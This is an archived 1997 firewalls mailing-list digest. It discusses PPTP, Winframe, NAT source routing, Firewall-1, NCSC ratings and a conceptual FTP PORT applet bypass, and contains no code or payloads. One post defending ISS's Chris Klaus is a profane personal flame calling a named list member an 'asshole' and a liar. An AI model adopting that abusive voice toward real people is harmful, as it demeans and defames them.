Received: from imc.eyron.com (mail.eyron.com [192.116.223.180]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id XAA17212 for ; Sun, 5 Jan 1997 23:56:39 -0800 (PST)
Received: by imc.eyron.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFBB7.CC993440@imc.eyron.com>; Mon, 6 Jan 1997 09:55:51 +0200
Message-ID:
From: Dov Sharon
To: "'firewalls@greatcircle.com'"
Subject: Windows NT PPTP
Date: Mon, 6 Jan 1997 09:56:24 +0200
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi

Does anybody know how secure the PPTP service provided with Windows NT 4.0 is for establishing a VPN across the internet? Are there any known security holes when using this service?

Thanks

Dov Sharon
System Admin
Eyron Ltd.
From firewalls-owner Mon Jan 6 00:29:04 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA18163 for firewalls-outgoing; Mon, 6 Jan 1997 00:15:01 -0800 (PST)
Received: from malraux.matranet.com (malraux.matranet.com [194.117.213.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA18153 for ; Mon, 6 Jan 1997 00:14:42 -0800 (PST)
Received: (from uucp@localhost) by malraux.matranet.com (8.7.4/8.7.3) id JAA07370; Mon, 6 Jan 1997 09:03:55 +0100 (MET)
Received: from verlaine.imatranet.com(192.0.2.2) by malraux.matranet.com via smap (3.2) id xma007366; Mon, 6 Jan 97 09:03:38 +0100
Received: from kafka.imatranet.com ([192.0.2.22]) by verlaine.imatranet.com (post.office MTA v2.0 0813 ID# 0-29132U60) with ESMTP id AAA228; Mon, 6 Jan 1997 09:12:19 +0100
From: "Xavier Fauquet"
To: "Jamie Thain" , "Mike Bernhardt" , "Ralph Docken" , , "Chris Lonvick"
Subject: Re: Using Remote Workstation as Hole??
Date: Mon, 6 Jan 1997 00:49:13 +0100
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Message-ID: <19970106081219047.AAA228@kafka.imatranet.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Could someone point me to a site explaining what Winframe is?

Thanks

----------
> From: Jamie Thain
> To: Mike Bernhardt ; Ralph Docken ; Firewalls@GreatCircle.COM; Chris Lonvick
> Subject: Re: Using Remote Workstation as Hole??
> Date: mercredi 1 janvier 1997 01:12
>
> Chris,
>
> > I don't want to seem altogether pessimistic on the subject - but I do
> think
> > that a very determined person can crack any system, given enough time.
> Even
> > Mike's systems are not invulnerable. It would just take a very
> determined
> > person to get through his defenses - using electronic means.
>
> I agree, however what if you put a machine like a Winframe in your DMZ, and
> force all outside connections through that machine. The Winframe uses a
> proprietary protocol ICA, that is encrypted, and then encrypting the
> outside machine stream. Winframe can be configured such that it auto
> disconnects, has no virtual resources other than a screen, and requires the
> client to logon 100% of the time. Although the password is passed across
> the wire, if it is in a VPN there are effectively three layers of
> scrambling/encryption at that point.
>
> The protocol ICA
> The Winframe encryption,
> The protocol encryption.
>
> But there is always the cold war method... hold a gun to the person's head
> on the outside, while they retrieve data from the machine, or steal the
> tapes... ...
>
> Comments on the security of Winframe?
>
> regards:jamie

From firewalls-owner Mon Jan 6 00:44:46 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA18536 for firewalls-outgoing; Mon, 6 Jan 1997 00:26:28 -0800 (PST)
Received: from sunphil.sunphil.mozcom.com (sunphil.mozcom.com [206.151.138.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id AAA18522 for ; Mon, 6 Jan 1997 00:25:51 -0800 (PST)
Received: by sunphil.sunphil.mozcom.com (SMI-8.6/SMI-SVR4) id QAA18062; Mon, 6 Jan 1997 16:24:31 -0800
Date: Mon, 6 Jan 1997 16:24:31 -0800
From: drexx@sunphil.mozcom.com (Dexter D. Laggui)
Message-Id: <199701070024.QAA18062@sunphil.sunphil.mozcom.com>
To: firewalls@greatcircle.com, dwee@singapore.sun.com
Subject: FW-1 throughput? Etc.
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello world,

I would be very much obliged if anybody can please answer this:

1] How many packets per second can the Solstice Firewall-1 2.1 (installed in a Sun Sparcstation 20 with Solaris 2.5) process? In mbps terms?

2] Current needs dictate a solution involving FWs with multiple secure VPNs to mobile customers.
I like the capabilities of FW-1 2.1 very much but I understand that it does not support VPN today. Do I really need the SunScreen EFS to complement it?

3] Who do I talk to in Sun Singapore for FW and SunScreen training? What is the mailing list for Checkpoint/Solstice Firewall-1 users?

Thank you very much for your kindness. :-)

Yours,
Dexter D. Laggui
Systems Engineer
drexx@sunphil.mozcom.com
Philippine Systems Products Inc.

----- End Included Message -----

From firewalls-owner Mon Jan 6 04:14:19 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA29252 for firewalls-outgoing; Mon, 6 Jan 1997 04:00:24 -0800 (PST)
Received: from sonda.cl (mail.sonda.cl [200.6.65.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id DAA29158 for ; Mon, 6 Jan 1997 03:59:59 -0800 (PST)
Received: by guardia.sonda.cl id <24196>; Mon, 6 Jan 1997 09:02:45 -0300
Posted-Date: Mon, 6 Jan 1997 08:57:14 -0300
Date: Mon, 6 Jan 1997 02:47:07 -0300
Message-Id: <97Jan6.090245cdt.24196@guardia.sonda.cl>
From: m_fliguer@sonda.cl (Miguel Fliguer - Troppus Erawtfos)
To: firewalls@GreatCircle.COM
Subject: Re: Air Force Web Site Hacked
X-VMS-To: SMTP%"firewalls@GreatCircle.com"
X-VMS-Cc: M_FLIGUER
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

uskanbye@ibmmail.com wrote :

>>> [snip snip snip]
>>> Physical read-only storage may offer SOME protection, but still
>>> not hackproof (not to mention the probable performance penalty
>>> you'd pay for optical.

Let's go one step further and make the website ROM-based ;-) Even better, let's put the pages on some sort of non-volatile RAM with a "Write Enable" jumper. Then, when a page change is needed, we'll only need to open the case, put the jumper on, make the changes, remove the jumper, close the case... All performance problems inherent to CD-ROM speed are gone !!! :-)

Sorry, it was stronger than myself....
Regards,
Miguel
m_fliguer@scomp1.sonda.cl

From firewalls-owner Mon Jan 6 04:59:09 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA01273 for firewalls-outgoing; Mon, 6 Jan 1997 04:52:44 -0800 (PST)
Received: from linda.if.is (linda.if.is [193.4.185.193]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id EAA01244 for ; Mon, 6 Jan 1997 04:52:23 -0800 (PST)
Received: from ilmur.if.is by linda.if.is (Secure/IFnet/18-11-96); Mon, 6 Jan 1997 12:24:58 GMT
Received: by ilmur.if.is (Secure/IFnet/09-12-96); Mon, 6 Jan 1997 12:57:20 GMT
From: gunni@if.is (Gunnar Ingvi Thorisson)
Message-Id: <199701061257.MAA32657@ilmur.if.is>
Subject: Re: Air Force Web Site Hacked
To: m_fliguer@sonda.cl (Miguel Fliguer - Troppus Erawtfos)
Date: Mon, 6 Jan 1997 12:57:18 +0000 (GMT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <97Jan6.090245cdt.24196@guardia.sonda.cl> from "Miguel Fliguer - Troppus Erawtfos" at Jan 6, 97 02:47:07 am
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> >>> [snip snip snip]
> >>> Physical read-only storage may offer SOME protection, but still
> >>> not hackproof (not to mention the probable performance penalty
> >>> you'd pay for optical.
>
> Let's go one step further and make the website ROM-based ;-) Even
> better, let's put the pages on some sort of non-volatile RAM with
> a "Write Enable" jumper. Then, when a page change is needed, we'll
> only need to open the case, put the jumper on, make the changes,
> remove the jumper, close the case... All performance problems
> inherent to CD-ROM speed are gone !!! :-)
>
> Sorry, it was stronger than myself....
>
> Regards,
> Miguel
> m_fliguer@scomp1.sonda.cl

I think this thread is getting OFF-TOPIC, please stop talking about this Air-Force web page hacking.
Once the hacker enters the site he changes the Document root to NFS mounted directory from the other side of the world!

Thank you,
Gunnar Ingvi Thorisson
Iceland Software Inc. - gunni@if.is
Coda (Financials) Iceland - gunni@coda.is

From firewalls-owner Mon Jan 6 05:59:09 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA03627 for firewalls-outgoing; Mon, 6 Jan 1997 05:47:42 -0800 (PST)
Received: from aragorn.kingston.net (aragorn.kingston.net [205.189.48.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id FAA03608 for ; Mon, 6 Jan 1997 05:47:31 -0800 (PST)
Received: (from uucp@localhost) by aragorn.kingston.net (8.6.12/8.6.12) with UUCP id JAA26252 for firewalls@GreatCircle.COM; Mon, 6 Jan 1997 09:01:02 -0500
Received: from ent106-ppp by empire.ca (SMI-8.6/SMI-SVR4) id TAA12111; Sat, 4 Jan 1997 19:34:42 -0500
Date: Sat, 4 Jan 1997 19:34:42 -0500
From: citpaj@aragorn.kingston.net (Paul Jenkins)
Message-Id: <199701050034.TAA12111@empire.ca>
To: firewalls@GreatCircle.COM
Subject: Mailing List
Cc: firewalls@GreatCircle.COM
X-Mailer: Pronto E-Mail [version 2.01]
MIME-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

As the Postmaster at empire.ca, I've noticed a lot of Firewall related mail from your site, addressed to Keith Grant, who used to work at our Company. As Keith is no longer with the Company, can you please remove him from your mailing list, so that we cease to be inundated with this mail about firewalls. It's a pain for me to have to watch it build, and then delete it occasionally, let alone the waste of disk space at our ISP and here at our site. Look forward to receiving your co-operation on this one.
Thanks,
Paul Jenkins

From firewalls-owner Mon Jan 6 08:54:50 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA10345 for firewalls-outgoing; Mon, 6 Jan 1997 08:15:33 -0800 (PST)
Received: from monet.mingpaoxpress.com (babbage.mingpaoxpress.com [205.150.120.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA10312 for ; Mon, 6 Jan 1997 08:15:07 -0800 (PST)
Received: by www.mingpaoxpress.com id <1929-10805>; Mon, 6 Jan 1997 11:14:33 -0500
Received: by www.mingpaoxpress.com id <1928-10808>; Mon, 6 Jan 1997 11:14:18 -0500
Path: acli
Subject: Re: Re[2]: NT NAT
Distribution: local
Organization: Ming Pao Daily News (Canada)
Message-ID:
References: <9701050100.AA02172@sonic.nmti.com.nmti.com>
Date: Mon, 6 Jan 1997 16:14:08 GMT
From: Ambrose Li
To: firewalls@greatcircle.com
Reply-To: Ambrose Li
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In article <9701050100.AA02172@sonic.nmti.com.nmti.com>, Peter da Silva wrote:
>> If I am using for example Linux, would it be enough to
>> configure the linux kernel to drop source routed packets?
>
>I don't know. It's a sysctl option in FreeBSD.

In Linux you have to recompile your kernel to turn on/off source routing.

--
Ambrose Li. acli@mingpaoxpress.com. Ming Pao Newspapers (Canada) Ltd., EDP department.
1355 Huntingwood Drive, Scarborough, Ontario, M1S 3J1, Canada.
Voice +1 416 321 0088 x272 Fax +1 416 321 9663.
My favourite OS has yet no

From firewalls-owner Mon Jan 6 08:58:34 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA10916 for firewalls-outgoing; Mon, 6 Jan 1997 08:35:38 -0800 (PST)
Received: from arden.iss.net (arden.iss.net [204.241.60.8]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA10878 for ; Mon, 6 Jan 1997 08:34:48 -0800 (PST)
Received: (from mhw@localhost) by arden.iss.net (8.8.4/8.7.3) id MAA06710; Mon, 6 Jan 1997 12:33:46 -0500
From: Michael Warfield
Message-Id: <199701061733.MAA06710@arden.iss.net>
Subject: Re: Christopher Klaus and ISS
To: lists@reflections.mindspring.com (Todd Graham Lewis)
Date: Mon, 6 Jan 1997 12:33:46 -0500 (EST)
Cc: firewalls@greatcircle.com
In-Reply-To: from "Todd Graham Lewis" at Dec 31, 96 09:04:36 pm
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

My apologies in advance to Brent and the other denizens on this list for raising the noise level on this subject but I feel, as a personal affront, this should not stand unchallenged...

In this matter, I am speaking solely for myself and my personal opinion and NOT for Internet Security Systems, Inc.

I took this last week to research issues brought up in these two messages. I asked other engineers at Internet Security Systems not to reply to these messages until I had completed my research and had replied myself.

On Tue, 31 Dec 1996 Todd Graham Lewis enscribed thusly:
> On Mon, 23 Dec 1996, Feeney, Tim wrote:
> > Well since Mr. Klaus refuses to play by the rules I would like to see
> > all mail from iss.net bounced back to them. I realize that some people
> > want to see what they have to offer but there are plenty of "HELP" posts
> > to this list that Mr. Klaus can put his (and his company's) two cents
> > in.
> > He instead insists on posting non-solicited marketing dribble to a
> > list that already has quite a volume. Any comments or seconds?

I reviewed the archives for the firewalls mailing list for all of 1996 looking for postings by Chris. In that last year there have been a grand total of 18 messages. Five of these were "Re:'s" replying to someone else's questions or information. Several of them were providing security related information or commentary on such subjects as the InfoWorld firewalls comparison and Dan Farmer's security survey. One was an announcement that ISS would make an alpha version of some of our development software available free to combat the raging SYN flood problem that was occurring at that time. Several ISPs used that software to successfully abate crippling SYN flood attacks. Two messages, in December, were product announcements.

Chris has played by the rules. He posted a grand total of two "Announcements" clearly labeled as such and both on products very relevant to security and firewalls. One is even a product being actively used to test firewalls. Commercial, yes, but no more commercial than hundreds (yes I said hundreds and I mean hundreds) of other commercial messages that have appeared on this list. His one "sin" was that one of the messages was excessive and he should have posted a URL in a short message rather than the longer announcement. When I mentioned that matter to him he agreed that he had made a mistake on that and that he was wrong there. His mistakes are ones of enthusiasm more than anything else. He is rightfully proud of what we have created and continue to create.

He has actually behaved much better than some of the other slime who have attempted to use underhanded, thinly veiled excuses, to get their commercial messages across.
Let's NOT forget "Dr Fredrick Cohen, PhD" and his piles and piles of messages, some relevant, some not, some trivial to the point of ridiculous, and some even destructive (remember his suggestion to "cut the wire to the record head on the floppy drive to make it read only" :-) ), that were used as a vehicle to plaster us with his advertisement signatures. That continued unabated for months until Brent was finally forced to pull the plug on Ol' Freddy... His nonsense got so bad it prompted some of the members of this list to include signatures which read "So you've got a PhD, just don't touch anything". That was well over a year ago (probably before your time Todd, so you're excused) and I STILL see that sig line showing up all over the place.

We are talking about two, TWO, (yes Todd even you can count to two) announcements, both of which were topic relevant, for new products which could well have been of interest to the participants on this list. And unlike many other messages posted to this list, they were clearly and appropriately labeled as "Announcements".

> I've never found Klaus to be helpful at anything other than selling his
> product and treating his employees like crap. The second point is
> really unrelated to the motion, but mentioning it makes me feel better
> about seconding that Klaus be banished.

I read this message last Tuesday and went on an immediate hunt to figure out just what you were talking about. Every employee I talked to at ISS wants me to ask you some burning questions... WHAT DRUGS ARE YOU ON AND WHERE CAN WE BUY SOME?!?!? Since you are obviously not high on reality, we've all come to the conclusion that you must be participating seriously in some better living through modern chemistry! I even checked with some of our ex-employees. I've had three whole engineers out of our entire staff leave for other, bigger, positions. Nobody seems to know what the F*CK you are talking about. What's more, most of us have never heard of you.
A few of us, myself included, did hear you speak in front of the Atlanta Linux Enthusiasts meeting a while ago. My opinion of you at this point is that you have hit a new all time low and you've started to dig!

Since all of the messages Chris has posted have been on security and firewalls related topics and the vast majority have been non-commercial, I've come to the conclusion that your first point is either a bald-faced lie or sheer blatant ignorance (or, I suspect, BOTH). Where you came up with that "second" point is totally and absolutely beyond any of us! Seeing as the vast majority of ISS employees don't even know who the F*CK you are (and those of us who do now wish we didn't), this claim is total and complete bullshit! You have absolutely no knowledge of the working conditions at ISS (which in my 30 years of participation in Corporate America are by far some of the best).

Perhaps there IS another motive here though. Several times in the past, Mindspring has been soliciting for engineers at the Atlanta Unix Users Group. Being one of the resident "gurus" there for over eight years, I have also been looking for engineers to add to my staff at those meetings. Some of you even asked me, one night, why I hadn't signed on over at Mindspring. Perhaps this has more to do with your recruitment attempts than anything to do with this list. Make it sound like ISS is not such a good place to work for and maybe you would have a better shot at recruiting around AUUG?

> __
> Todd Graham Lewis Linux! Core Engineering
> Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804

On Wed, 1 Jan 1997 Todd Graham Lewis enscribed thusly:
> On Tue, 31 Dec 1996, Robert Hanson wrote:
> > no disrespect intended to you Todd, yet....

Naw - go ahead. Intend the disrespect he deserves... He's earned it!

> > kill! maim! shoot! my goodness... we are all capitalist pigs... what
> > makes anyone better than anyone else standing next to them...
> I not only like corporations, I work for one. Believe it or not, I don't
> even have a problem with vendors discussing their products on the list.
> Those who offer help to newbies, contribute to technical discussions,
> etc., are more than entitled to mention once in a while "BTW (disclaimer:
> I work for 'em), our product X is designed to address this problem", or
> even to say "In light of the discussion last month, I thought that the
> list might be interested in our new product, SuperBlammo4000."

> What I don't appreciate are bone-headed sales pitches coming from people
> who never participate in the discussions on the list, and whose sole
> purpose is to use the list as a free advertising channel.

Chris Klaus is not a sales person. Quite the contrary, he's an engineer, who wrote and released the "shareware" version of ISS long before Dan Farmer announced SATAN. That version is still available from CERT. He does have the common sense NOT to post just for the sake of posting. He posts when he has something to contribute to the list, either to an existing discussion or providing new information. This list would be a terribly empty (but noisy) place if anyone with commercial information were forbidden to mention it in mixed company. Chris Klaus has made serious contributions to the state of the art in network security. This is far more than anyone can say about you.

> I don't think that this is too far off the mark, and the fact that Klaus
> is a complete asshole just makes the decision that much easier.

Off the mark? You aren't even on the same plane of reality. Chris Klaus doesn't know you and you don't know him. I do know both of you and as far as assholes go, I would rather work FOR Chris Klaus than WITH an asshole like you! You really need to see a doctor about that case of optical rectitus. It's beginning to look like it's on steroids now.
It's no wonder that, having had your head up your ass so deep and for so long, you now have such a shitty outlook on life.

> (BTW, I'm sorry I wasn't able to participate in the discussion about Linux
> firewalls. I was visiting family during the holidays.)
> __
> Todd Graham Lewis Linux! Core Engineering
> Mindspring Enterprises tlewis@mindspring.com (800) 719 4664, x2804

Regards,
Mike
--
Michael H. Warfield | Voice: (770)395-0150x123 (770)552-4823
Senior Engineer | Fax: (770)395-1972
Internet Security Systems, Inc. | E-Mail: mhw@iss.net mhw@wittsend.com
41 Perimeter Center East, Suite 660 | http://www.iss.net/
Atlanta, GA 30328 | http://www.wittsend.com/mhw/
PGP Key: 0xDF1DD471 http://www.wittsend.com/mhw/pubkey.txt

From firewalls-owner Mon Jan 6 09:50:37 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA13703 for firewalls-outgoing; Mon, 6 Jan 1997 09:39:26 -0800 (PST)
Received: from pcslink.com (pcslink.com [206.43.160.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id JAA13695 for ; Mon, 6 Jan 1997 09:39:13 -0800 (PST)
Received: (from ryan@localhost) by pcslink.com (8.8.3/8.6.12) id KAA16417; Mon, 6 Jan 1997 10:38:28 -0700 (MST)
From: Ryan Mooney
Message-Id: <199701061738.KAA16417@pcslink.com>
Subject: Re: Re[2]: NT NAT
To: peter@baileynm.com (Peter da Silva)
Date: Mon, 6 Jan 1997 10:38:27 -0700 (MST)
Cc: ckn@findata.se, firewalls@GreatCircle.COM
In-Reply-To: <9701041543.AA00908@sonic.nmti.com.nmti.com> from "Peter da Silva" at Jan 4, 97 09:43:54 am
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> > > Please correct me if I'm wrong here but I was under the impression that
> > the 192.168.x.x-addresses was 'non-routable' or whatever the term is.
> > Under what circumstances can an external intruder gain access to my
> > internal 192.168.x.x-machines?
>
> Source routed packets.
> Which can and should be turned off in the router/and/or/IP Masq box.

which should also do such obvious things as filter out packets to the inside addresses claiming to be from the inside... etc... this is basic stuff that you should do with EVERY firewalled environment IMHO.

NAT with some decent filters is IMNSHO just above straight filters and straight through proxies in the security sense. Really the next level is to have a proxy that understands the protocol and can interpret the data stream for "bad things" (ie: the fwtk patches to gw-http that can filter based on tags and disallow active X, Java, etc..). If you think a stand alone straight through proxy is more secure than a good filter set on a newer router OS, you've been drinking the vendor cool-aid. Again a proxy that understands the application data stream can be more secure.

This goes back to some earlier statements that other people have alluded to, and that is the case of "Good Enough Security". If you have a billion dollars you are trying to protect, you'd better nail things down pretty damn tight. On the other hand if you are trying to protect a 1K/mo charity you'd scale things back a bit. You can't just say "This is THE solution", you have to look at the situation, analyze it, and THEN you can say "this is good enough security, here". Appropriate solutions for appropriate problems. I think too many people here get caught up in finding the 100% secure solution, this may or may not be practical in all environments (both from an economic and usability standpoint).

That said, NAT can be an important part of an overall security scheme and may/should be coupled with other security measures including router filters, and perhaps some appropriate proxies. It is not THE solution, nothing is THE solution, they are all pieces and parts that need to be used appropriately.
----------------------------------------------------------------------------
Ryan Mooney Phone (602)265-9188
PCSLink ryan@pcslink.com Fax (602)265-9357
Internet Services
The world needs more bitter, twisted souls. It would be a much better place.
-----------------------------------------------------------------------------

From firewalls-owner Mon Jan 6 11:11:33 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA18124 for firewalls-outgoing; Mon, 6 Jan 1997 10:44:55 -0800 (PST)
Received: from computer.mindspring.com (computer.mindspring.com [204.180.142.145]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA18086 for ; Mon, 6 Jan 1997 10:44:35 -0800 (PST)
Received: (from ahobson@localhost) by computer.mindspring.com (8.8.4/8.8.4) id NAA00630; Mon, 6 Jan 1997 13:43:35 -0500 (EST)
From: Andrew Hobson
To: Michael Warfield
Cc: firewalls@greatcircle.com
Subject: Re: Christopher Klaus and ISS
References: <199701061733.MAA06710@arden.iss.net>
Mime-Version: 1.0 (generated by tm-edit 7.96)
Content-Type: text/plain; charset=US-ASCII
Date: 06 Jan 1997 13:43:35 -0500
In-Reply-To: Michael Warfield's message of Mon, 6 Jan 1997 12:46:28 EST
Message-ID:
Lines: 25
X-Mailer: Red Gnus v0.73/XEmacs 19.15
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I'd like only one small clarification. I make no comment on the flame fest.

On Mon, 6 Jan 1997 12:46:28 EST, Michael Warfield said:
> Perhaps there IS another motive here though. Several times in the
> past, Mindspring has been soliciting for engineers at the Atlanta Unix Users
> Group. Being one of the resident "gurus" there for over eight years, I have
> also been looking for engineers to add to my staff at those meetings. Some
> of you even asked me, one night, why I hadn't signed on over at Mindspring.
> Perhaps this has more to do with your recruitment attempts than anything to
> do with this list.
> Make it sound like ISS is not such a good place to work
> for and maybe you would have a better shot at recruiting around AUUG?

I make no comment about Todd's post. He was, most certainly, speaking for himself and *not* MindSpring. If Todd was bad mouthing ISS in order to recruit for MindSpring, then that's unacceptable. I'll ask Todd to refrain from speaking about ISS.

Drew
--
"Joe, release me from your Kung-Fu grip." -- Stacy Lavelle

From firewalls-owner Mon Jan 6 11:29:09 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA20474 for firewalls-outgoing; Mon, 6 Jan 1997 11:20:42 -0800 (PST)
Received: from mail2.visi.net (geneva.visi.net [204.71.248.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA20467 for ; Mon, 6 Jan 1997 11:20:29 -0800 (PST)
Received: from LOCALNAME (ppp-1-39.nn.visi.net [206.246.196.39]) by mail2.visi.net (8.8.4/12000) with SMTP id OAA12182; Mon, 6 Jan 1997 14:16:59 -0500 (EST)
Date: Mon, 6 Jan 1997 14:16:59 -0500 (EST)
Message-Id: <199701061916.OAA12182@mail2.visi.net>
X-Sender: rodrcc@mail.visi.net
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: "Richard F. Trezza"
From: Information Systems Security Officer
Subject: Re: Firewall Security Ratings
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 01:01 PM 12/27/96 -0500, you wrote:
>Greetings,
>
>Does anyone know of a URL or other Internet resource where I can verify
>firewall vendor claims regarding U.S. Government computer security
>ratings. Specifically, the so-called B1 and B2 classifications issued by
>the National Computer Security Center?
>
>Happy New Year and thanks in advance.
>
> Richard

The address that you seek is www.radium.ncsc.mil/tpep/. This is the listing for and about the Trusted Product Evaluation Program.
From firewalls-owner Mon Jan 6 12:40:22 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA23990 for firewalls-outgoing; Mon, 6 Jan 1997 12:28:26 -0800 (PST)
Received: from news.ptes.com (NEWSHOST.PTES.COM [138.112.199.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA23973 for ; Mon, 6 Jan 1997 12:28:15 -0800 (PST)
Received: from [138.112.190.103] (mike.ptes.com [138.112.190.103]) by news.ptes.com (8.8.4/8.8.4) with SMTP id MAA05228; Mon, 6 Jan 1997 12:26:26 -0800 (PST)
X-Sender: mike@pescadero.ptes.com
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Mon, 6 Jan 1997 12:29:00 -0900
To: Todd Graham Lewis , Ken Hardy
From: mike@ptes.com (Mike Bernhardt)
Subject: Re: Untrusted vs. trusted network security
Cc: Firewalls Mailing List
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>On Fri, 20 Dec 1996, Ken Hardy wrote:
>
>> The problem is ...
>>
>> The applet opens a connection back to its home system on port 21, the
>> FTP port. The firewall allows outgoing FTP, so that's fine. The
>> applet then issues a PORT command on the FTP channel to tell the remote
>> FTP server to make a connection to a data socket that it's opened on
>> some other port, as per the FTP protocol spec. The firewall, which
>> normally prevents all inbound connections, sees the PORT command and
>> opens that port to the applet's machine for the incoming FTP transfer.
>>
>> But the firewall is unable to know that the commands are coming from an
>> applet and not a "real" FTP client, and the applet used port 23
>> (telnet) or 25 (smtp) or 139 (netbios) in the PORT command. So now the
>> blackhat's system has an open channel to the chosen port on the machine
>> running the applet. Firewall? What firewall?
>
>Port command? What port command?
>
>Virtually all modern ftp clients support the passive option. I force my
>users to use it for just this reason, and I haven't heard too many
>complaints.
>
>Proxying return FTP connections is going too far in the direction of
>appeasing the user.
>

Isn't this the benefit of using more than one means of protection? A simple packet filter closes this hole, by simply not allowing any inbound traffic to port 23. For example, our packet filtering allows NO inbound traffic to ports <1024, except for certain services to certain hosts. So no matter what the firewall thinks is OK, the packet filter won't let it through. I would think the problem described above is due more to misconfiguration than to a real "hole." If I'm wrong, please correct me, someone.

-------------------------------------------------------------
"He who dies with the most toys, still dies."

From firewalls-owner Mon Jan 6 13:42:46 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA26777 for firewalls-outgoing; Mon, 6 Jan 1997 13:08:44 -0800 (PST)
Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA26532 for ; Mon, 6 Jan 1997 13:02:16 -0800 (PST)
Received: from splinter.rtp.dg.com by dg-rtp.dg.com (5.4R3.10/dg-rtp-v02) id AA23842; Mon, 6 Jan 1997 16:00:58 -0500
Received: by splinter.rtp.dg.com (8.6.10/200.15.1.2) id QAA10279; Mon, 6 Jan 1997 16:00:38 -0500
From: spencerj@dg-rtp.dg.com (Jon Spencer)
Message-Id: <199701062100.QAA10279@splinter.rtp.dg.com>
Subject: Re: NCSA != NCSC
To: ckaplan@nohackers.com
Date: Mon, 6 Jan 1997 16:00:33 -0500 (EST)
Cc: firewalls@greatcircle.com
In-Reply-To: <19961230094439.02e47f85.in@cbk.nohackers.com> from "ckaplan@nohackers.com" at Dec 30, 96 04:44:39 am
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> I have to say up front that I agree with MJR.
>
> Hardening and creativity in your OS are great for a firewall, however a NCSC
> just isn't directly enough applicable.
>
> >Can you explain how the "hardened" OS helps? If the firewall
> >software is implemented below the OS layer (e.g.: some kind
> >of adaptive filtering or whatever) then the OS will never even "see"
> >the traffic at all and whether it's an evaluated OS or not is
> >completely irrelevant. If the firewall software is purely application
>
> I don't even think that this is a totally valid argument in MOST implementations.
>
> True that in a MLSI firewall this conceptually is true, however people love
> to add 'stuff' to their firewalls. Stuff like mail handlers, DNS servers,
> HTTPDs, etc.. As soon as they do that this stuff becomes the weak link in
> their system.
> While I would imagine that some exist I don't think I have seen any yet
> configured as solo systems.
>
> The villain exploits one of the above and is then on the box. At that point
> a trusted OS is unlikely to help. Those processes all too often are run as
> root (Yes I know that they shouldn't, don't need to, could fork, etc...but I
> am talking what far too many people end up running) and leave the villain
> free to go on in.

